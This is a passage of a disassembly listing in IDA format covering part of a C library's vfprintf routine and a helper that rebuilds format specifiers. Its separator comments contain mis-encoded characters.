loc_8052287: ; CODE XREF: vfprintf+29E1j ; vfprintf+29E8j ... 
mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx], 0 jle short loc_80522D0 mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] mov edi, [ebx+ecx] sub [ebx+ecx+4], edi mov edx, [ebx+ecx] dec dword ptr [ebx+ecx] test edx, edx jle short loc_80522D0 mov eax, [ebp+var_4D0] loc_80522BC: ; CODE XREF: vfprintf+2A46j mov byte ptr [esi], 30h dec esi mov ecx, [ebp+var_4AC] mov edx, [ecx+eax] dec dword ptr [ecx+eax] test edx, edx jg short loc_80522BC loc_80522D0: ; CODE XREF: vfprintf+2A0Fj ; vfprintf+2A2Cj cmp [ebp+var_4C8], 0 jz short loc_80522FA mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] cmp dword ptr [edi+ebx+18h], 0 jz short loc_80522FA cmp [ebp+var_4F0], 10h jnz short loc_80522FA add dword ptr [edi+ebx+4], 0FFFFFFFEh loc_80522FA: ; CODE XREF: vfprintf+2A4Fj ; vfprintf+2A62j ... cmp [ebp+var_4CC], 0 jnz short loc_805231D mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+24h], 0 jnz short loc_805231D cmp dword ptr [ebx+ecx+1Ch], 0 jz short loc_805232D loc_805231D: ; CODE XREF: vfprintf+2A79j ; vfprintf+2A8Cj mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] dec dword ptr [ecx+edi+4] loc_805232D: ; CODE XREF: vfprintf+2A93j mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] cmp dword ptr [edi+ebx+20h], 0 jnz short loc_8052372 cmp byte ptr [edi+ebx+2Ch], 30h jnz short loc_8052372 mov edx, [edi+ebx+4] dec dword ptr [edi+ebx+4] test edx, edx jle short loc_8052372 mov eax, [ebp+var_4D0] db 8Dh,76h,0 ; lea esi, [esi+0] loc_805235C: ; CODE XREF: vfprintf+2AE8j mov byte ptr [esi], 30h dec esi mov ecx, [ebp+var_4AC] mov edx, [ecx+eax+4] dec dword ptr [ecx+eax+4] test edx, edx jg short loc_805235C loc_8052372: ; CODE XREF: vfprintf+2AB6j ; vfprintf+2ABDj ... 
cmp [ebp+var_4C8], 0 jz short loc_80523A2 mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] cmp dword ptr [edi+ebx+18h], 0 jz short loc_80523A2 cmp [ebp+var_4F0], 10h jnz short loc_80523A2 mov dl, [edi+ebx+8] mov [esi], dl dec esi mov byte ptr [esi], 30h dec esi loc_80523A2: ; CODE XREF: vfprintf+2AF1j ; vfprintf+2B04j ... cmp [ebp+var_4CC], 0 jz short loc_80523B0 mov byte ptr [esi], 2Dh jmp short loc_80523DE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80523B0: ; CODE XREF: vfprintf+2B21j mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+24h], 0 jz short loc_80523C8 mov byte ptr [esi], 2Bh jmp short loc_80523DE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80523C8: ; CODE XREF: vfprintf+2B39j mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+1Ch], 0 jz short loc_80523DF mov byte ptr [esi], 20h loc_80523DE: ; CODE XREF: vfprintf+2B26j ; vfprintf+2B3Ej dec esi loc_80523DF: ; CODE XREF: vfprintf+2B51j mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] cmp dword ptr [edi+ebx+20h], 0 jnz short loc_8052422 cmp byte ptr [edi+ebx+2Ch], 20h jnz short loc_8052422 mov edx, [edi+ebx+4] dec dword ptr [edi+ebx+4] test edx, edx jle short loc_8052422 mov eax, [ebp+var_4D0] nop loc_805240C: ; CODE XREF: vfprintf+2B98j mov byte ptr [esi], 20h dec esi mov ecx, [ebp+var_4AC] mov edx, [ecx+eax+4] dec dword ptr [ecx+eax+4] test edx, edx jg short loc_805240C loc_8052422: ; CODE XREF: vfprintf+2B68j ; vfprintf+2B6Fj ... 
mov ebx, [ebp+arg_0] mov ebx, [ebx+50h] mov edi, esi not edi add edi, ebp push edi lea edx, [esi+1] push edx mov ecx, [ebp+arg_0] push ecx mov edx, [ebx+34h] call edx add esp, 0Ch cmp eax, edi jnz loc_8050E72 ; case 0x0 add [ebp+var_464], eax mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] cmp dword ptr [edi+ebx+20h], 0 jz loc_8052933 cmp dword ptr [edi+ebx+4], 0 jle loc_8052933 mov edx, [edi+ebx+4] push edx push 20h mov ecx, [ebp+arg_0] push ecx jmp loc_8052702 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8052480: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov eax, offset sub_8053310 ; case 0x45 jmp loc_80528AF ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805248C: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov ebx, [ebp+var_4D0] ; case 0x63 mov edi, [ebp+var_4AC] dec dword ptr [edi+ebx+4] cmp dword ptr [edi+ebx+20h], 0 jnz short loc_80524C3 cmp dword ptr [edi+ebx+4], 0 jle short loc_80524C3 mov edx, [edi+ebx+4] push edx push 20h mov ecx, [ebp+arg_0] push ecx call sub_8062534 add [ebp+var_464], eax add esp, 0Ch loc_80524C3: ; CODE XREF: vfprintf+2C19j ; vfprintf+2C20j mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] mov edx, [edi+ebx+40h] lea edx, [edx+edx*2] mov ecx, [ebp+var_4B4] movzx eax, byte ptr [ecx+edx*4] mov ebx, [ebp+arg_0] mov edx, [ebx+14h] cmp [ebx+18h], edx ja short loc_8052504 movzx edx, al push edx push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8050E72 ; case 0x0 jmp short loc_8052525 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8052504: ; CODE XREF: vfprintf+2C61j mov edi, [ebp+arg_0] mov edx, [edi+14h] mov byte ptr [ebp+var_4E0], al mov [edx], al movzx edx, byte ptr [ebp+var_4E0] inc dword ptr [edi+14h] cmp edx, 0FFFFFFFFh jz loc_8050E72 ; case 0x0 loc_8052525: ; CODE XREF: vfprintf+2C79j inc [ebp+var_464] mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+20h], 0 jz loc_8052933 cmp dword ptr [ebx+ecx+4], 0 jle loc_8052933 mov 
edx, [ebx+ecx+4] push edx push 20h mov edi, [ebp+arg_0] push edi jmp loc_8052702 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052560: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov ecx, [ebp+var_4D0] ; case 0x73 mov ebx, [ebp+var_4AC] mov edx, [ebx+ecx+40h] lea edx, [edx+edx*2] mov edi, [ebp+var_4B4] mov esi, [edi+edx*4] loc_805257C: ; CODE XREF: vfprintf+2EF9j ; vfprintf+2F06j ... test esi, esi jnz short loc_80525C0 mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx], 0FFFFFFFFh jz short loc_8052598 cmp dword ptr [ebx+ecx], 5 jle short loc_80525AC loc_8052598: ; CODE XREF: vfprintf+2D08j mov esi, offset aNull ; "(null)" mov [ebp+var_4F0], 6 jmp loc_805266C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80525AC: ; CODE XREF: vfprintf+2D0Ej mov esi, offset unk_8067EEB mov [ebp+var_4F0], 0 jmp loc_805266C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80525C0: ; CODE XREF: vfprintf+2CF6j mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi], 0FFFFFFFFh jz short loc_8052608 mov edx, [ecx+edi] push edx push 0 push esi call sub_80575C0 add esp, 0Ch test eax, eax jz short loc_80525F0 sub eax, esi mov [ebp+var_4F0], eax jmp short loc_805266C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80525F0: ; CODE XREF: vfprintf+2D5Bj mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] mov ebx, [edi+ebx] mov [ebp+var_4F0], ebx jmp short loc_805266C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8052608: ; CODE XREF: vfprintf+2D48j xor al, al mov [ebp+var_4F0], esi mov edi, esi cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx dec edx mov [ebp+var_4F0], edx mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+4], 0 jnz short loc_805266C mov edi, [ebp+arg_0] mov edx, [edi+50h] mov ecx, [ebp+var_4F0] push ecx push esi push edi mov edx, [edx+34h] call edx add esp, 0Ch cmp [ebp+var_4F0], eax jnz loc_8050E72 ; case 0x0 mov ebx, [ebp+var_4F0] add [ebp+var_464], ebx jmp 
loc_8052933 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805266C: ; CODE XREF: vfprintf+2D1Fj ; vfprintf+2D33j ... mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] mov edx, [ecx+edi+4] sub edx, [ebp+var_4F0] mov [ecx+edi+4], edx cmp dword ptr [ecx+edi+20h], 0 jnz short loc_80526A6 test edx, edx jle short loc_80526A6 push edx push 20h mov ebx, [ebp+arg_0] push ebx call sub_8062534 add [ebp+var_464], eax add esp, 0Ch loc_80526A6: ; CODE XREF: vfprintf+2E03j ; vfprintf+2E07j mov edi, [ebp+arg_0] mov edx, [edi+50h] mov ecx, [ebp+var_4F0] push ecx push esi push edi mov edx, [edx+34h] call edx add esp, 0Ch cmp [ebp+var_4F0], eax jnz loc_8050E72 ; case 0x0 mov ebx, [ebp+var_4F0] add [ebp+var_464], ebx mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+20h], 0 jz loc_8052933 cmp dword ptr [ecx+edi+4], 0 jle loc_8052933 mov edx, [ecx+edi+4] push edx push 20h mov ebx, [ebp+arg_0] push ebx loc_8052702: ; CODE XREF: vfprintf+2BF2j ; vfprintf+2CD0j call sub_8062534 add [ebp+var_464], eax add esp, 0Ch jmp loc_8052933 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052718: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov edi, [ebp+var_4D0] ; case 0x70 mov ecx, [ebp+var_4AC] mov edx, [ecx+edi+40h] lea edx, [edx+edx*2] mov ebx, [ebp+var_4B4] mov edx, [ebx+edx*4] test edx, edx jz short loc_805276C mov [ebp+var_4F0], 10h mov [ebp+var_4C8], edx mov [ebp+var_4CC], 0 mov dword ptr [ecx+edi+18h], 1 mov byte ptr [ecx+edi+8], 78h mov dword ptr [ecx+edi+28h], 0 jmp loc_80520FB ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805276C: ; CODE XREF: vfprintf+2EAEj mov esi, offset aNil_0 ; "(nil)" mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi], 4 jg loc_805257C mov dword ptr [ecx+edi], 5 jmp loc_805257C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8052794: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov ebx, [ebp+var_4D0] ; case 0x6e mov edi, [ebp+var_4AC] cmp dword ptr 
[edi+ebx+0Ch], 0 jz short loc_80527CC mov edx, [edi+ebx+40h] lea edx, [edx+edx*2] mov ecx, [ebp+var_4B4] mov eax, [ecx+edx*4] mov ecx, [ebp+var_464] xor ebx, ebx mov [eax], ecx mov [eax+4], ebx jmp loc_8052933 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80527CC: ; CODE XREF: vfprintf+2F1Dj mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] cmp dword ptr [edi+ebx+14h], 0 jz short loc_80527FC mov edx, [edi+ebx+40h] lea edx, [edx+edx*2] mov ecx, [ebp+var_4B4] mov edx, [ecx+edx*4] mov ebx, [ebp+var_464] mov [edx], ebx jmp loc_8052933 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80527FC: ; CODE XREF: vfprintf+2F55j mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+10h], 0 jnz short loc_805282C mov edx, [ecx+edi+40h] lea edx, [edx+edx*2] mov ebx, [ebp+var_4B4] mov edx, [ebx+edx*4] mov edi, [ebp+var_464] mov [edx], edi jmp loc_8052933 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805282C: ; CODE XREF: vfprintf+2F85j mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] mov edx, [ebx+ecx+40h] lea edx, [edx+edx*2] mov edi, [ebp+var_4B4] mov edx, [edi+edx*4] mov cx, word ptr [ebp+var_464] mov [edx], cx jmp loc_8052933 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8052858: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o push 3E8h ; case 0x6d lea edx, [ebp+var_3E8] push edx mov edx, __errno push edx call sub_8056E14 mov esi, eax add esp, 0Ch jmp loc_805257C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805287C: ; CODE XREF: vfprintf+2401j ; vfprintf+2407j ; DATA XREF: ... 
cmp dword_807888C, 0 ; default jz short loc_80528A4 mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] movzx ebx, byte ptr [edi+ebx+8] mov edx, dword_807888C mov eax, [edx+ebx*4] jmp short loc_80528A6 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80528A4: ; CODE XREF: vfprintf+2FFBj xor eax, eax loc_80528A6: ; CODE XREF: vfprintf+3017j test eax, eax jnz short loc_80528AF mov eax, offset sub_80529CC loc_80528AF: ; CODE XREF: vfprintf+2BFDj ; vfprintf+3020j mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] mov ecx, [ebx+ecx+48h] lea edx, ds:0[ecx*4] sub esp, edx mov [ebp+var_4F0], esp xor esi, esi jmp short loc_80528FC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80528D4: ; CODE XREF: vfprintf+307Ej mov edx, esi mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] add edx, [ebx+ecx+40h] lea edx, [edx+edx*2] mov edi, [ebp+var_4B4] lea edx, [edi+edx*4] mov ecx, [ebp+var_4F0] mov [ecx+esi*4], edx inc esi loc_80528FC: ; CODE XREF: vfprintf+3048j mov edi, [ebp+var_4D0] cmp [ebx+edi+48h], esi ja short loc_80528D4 mov ecx, [ebp+var_4F0] push ecx mov edx, [ebp+var_4AC] add edx, [ebp+var_4D0] push edx mov ebx, [ebp+arg_0] push ebx call eax add esp, 0Ch test eax, eax jl loc_8050E72 ; case 0x0 add [ebp+var_464], eax loc_8052933: ; CODE XREF: vfprintf+2596j ; vfprintf+2BD6j ... 
mov edi, [ebp+arg_0] mov edi, [edi+50h] mov [ebp+var_4E0], edi mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] mov edx, [ebx+ecx+34h] sub edx, [ebx+ecx+30h] push edx mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] mov edx, [ecx+edi+30h] push edx mov ebx, [ebp+arg_0] push ebx mov edi, [ebp+var_4E0] mov edx, [edi+34h] call edx mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] mov edx, [ebx+ecx+34h] sub edx, [ebx+ecx+30h] add esp, 0Ch cmp eax, edx jnz loc_8050E72 ; case 0x0 add [ebp+var_464], eax add [ebp+var_4D0], 58h inc [ebp+var_460] mov edi, [ebp+var_4A4] cmp [ebp+var_460], edi jb loc_8051C08 loc_80529B8: ; CODE XREF: vfprintf+FFj ; vfprintf+15DAj ... mov eax, [ebp+var_464] loc_80529BE: ; CODE XREF: vfprintf+54j ; vfprintf+15EFj lea esp, [ebp+var_500] pop ebx pop esi pop edi mov esp, ebp pop ebp retn vfprintf endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_80529CC proc near ; DATA XREF: vfprintf+3022o var_410 = byte ptr -410h var_404 = dword ptr -404h var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 404h push edi push esi push ebx mov ebx, [ebp+arg_0] xor edi, edi mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_80529FC push 25h push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8052C84 jmp short loc_8052A05 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80529FC: ; CODE XREF: sub_80529CC+17j mov eax, [ebx+14h] mov byte ptr [eax], 25h inc dword ptr [ebx+14h] loc_8052A05: ; CODE XREF: sub_80529CC+2Dj inc edi mov ecx, [ebp+arg_4] cmp dword ptr [ecx+18h], 0 jz short loc_8052A3A mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052A30 push 23h push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8052C84 jmp short loc_8052A39 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052A30: ; CODE XREF: sub_80529CC+49j mov eax, [ebx+14h] mov byte ptr [eax], 23h inc 
dword ptr [ebx+14h] loc_8052A39: ; CODE XREF: sub_80529CC+5Fj inc edi loc_8052A3A: ; CODE XREF: sub_80529CC+41j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+28h], 0 jz short loc_8052A6E mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052A64 push 27h push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8052C84 jmp short loc_8052A6D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052A64: ; CODE XREF: sub_80529CC+7Dj mov eax, [ebx+14h] mov byte ptr [eax], 27h inc dword ptr [ebx+14h] loc_8052A6D: ; CODE XREF: sub_80529CC+93j inc edi loc_8052A6E: ; CODE XREF: sub_80529CC+75j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+24h], 0 jz short loc_8052AA0 mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052A98 push 2Bh loc_8052A81: ; CODE XREF: sub_80529CC+E7j push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8052C84 jmp short loc_8052AC1 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052A98: ; CODE XREF: sub_80529CC+B1j mov eax, [ebx+14h] mov byte ptr [eax], 2Bh jmp short loc_8052ABE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052AA0: ; CODE XREF: sub_80529CC+A9j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+1Ch], 0 jz short loc_8052AC2 mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052AB8 push 20h jmp short loc_8052A81 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052AB8: ; CODE XREF: sub_80529CC+E3j mov eax, [ebx+14h] mov byte ptr [eax], 20h loc_8052ABE: ; CODE XREF: sub_80529CC+D2j inc dword ptr [ebx+14h] loc_8052AC1: ; CODE XREF: sub_80529CC+C7j inc edi loc_8052AC2: ; CODE XREF: sub_80529CC+DBj mov ecx, [ebp+arg_4] cmp dword ptr [ecx+20h], 0 jz short loc_8052AF6 mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052AEC push 2Dh push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8052C84 jmp short loc_8052AF5 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 
陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052AEC: ; CODE XREF: sub_80529CC+105j mov eax, [ebx+14h] mov byte ptr [eax], 2Dh inc dword ptr [ebx+14h] loc_8052AF5: ; CODE XREF: sub_80529CC+11Bj inc edi loc_8052AF6: ; CODE XREF: sub_80529CC+FDj mov ecx, [ebp+arg_4] cmp byte ptr [ecx+2Ch], 30h jnz short loc_8052B2A mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052B20 push 30h push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8052C84 jmp short loc_8052B29 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052B20: ; CODE XREF: sub_80529CC+139j mov eax, [ebx+14h] mov byte ptr [eax], 30h inc dword ptr [ebx+14h] loc_8052B29: ; CODE XREF: sub_80529CC+14Fj inc edi loc_8052B2A: ; CODE XREF: sub_80529CC+131j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+4], 0 jz short loc_8052BA5 mov eax, [ecx+4] mov [ebp+var_404], ebp loc_8052B3C: ; CODE XREF: sub_80529CC+193j dec [ebp+var_404] mov ecx, 0Ah xor edx, edx div ecx mov esi, eax mov al, byte ptr ds:a0123456789abcd[edx] ; "0123456789abcdefghijklmnopqrstuvwxyz" mov ecx, [ebp+var_404] mov [ecx], al mov eax, esi test eax, eax jnz short loc_8052B3C mov esi, [ebp+var_404] jmp short loc_8052B9D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052B6C: ; CODE XREF: sub_80529CC+1D7j movzx edx, byte ptr [esi] mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052B88 movzx eax, dl push eax push ebx call sub_8061910 add esp, 8 jmp short loc_8052B93 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052B88: ; CODE XREF: sub_80529CC+1A9j mov eax, [ebx+14h] mov [eax], dl movzx eax, dl inc dword ptr [ebx+14h] loc_8052B93: ; CODE XREF: sub_80529CC+1B8j cmp eax, 0FFFFFFFFh jz loc_8052C84 inc edi loc_8052B9D: ; CODE XREF: sub_80529CC+19Bj inc esi lea eax, [ebp+var_1] cmp esi, eax jbe short loc_8052B6C loc_8052BA5: ; CODE XREF: sub_80529CC+165j mov ecx, [ebp+arg_4] cmp dword ptr [ecx], 
0FFFFFFFFh jz loc_8052C4D mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052BD0 push 2Eh push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8052C84 jmp short loc_8052BD9 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8052BD0: ; CODE XREF: sub_80529CC+1EBj mov eax, [ebx+14h] mov byte ptr [eax], 2Eh inc dword ptr [ebx+14h] loc_8052BD9: ; CODE XREF: sub_80529CC+201j inc edi mov ecx, [ebp+arg_4] mov eax, [ecx] mov [ebp+var_404], ebp db 8Dh,76h,0 ; lea esi, [esi+0] loc_8052BE8: ; CODE XREF: sub_80529CC+23Fj dec [ebp+var_404] mov ecx, 0Ah xor edx, edx div ecx mov esi, eax mov al, byte ptr ds:a0123456789abcd[edx] ; "0123456789abcdefghijklmnopqrstuvwxyz" mov ecx, [ebp+var_404] mov [ecx], al mov eax, esi test eax, eax jnz short loc_8052BE8 mov esi, [ebp+var_404] jmp short loc_8052C45 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052C18: ; CODE XREF: sub_80529CC+27Fj movzx edx, 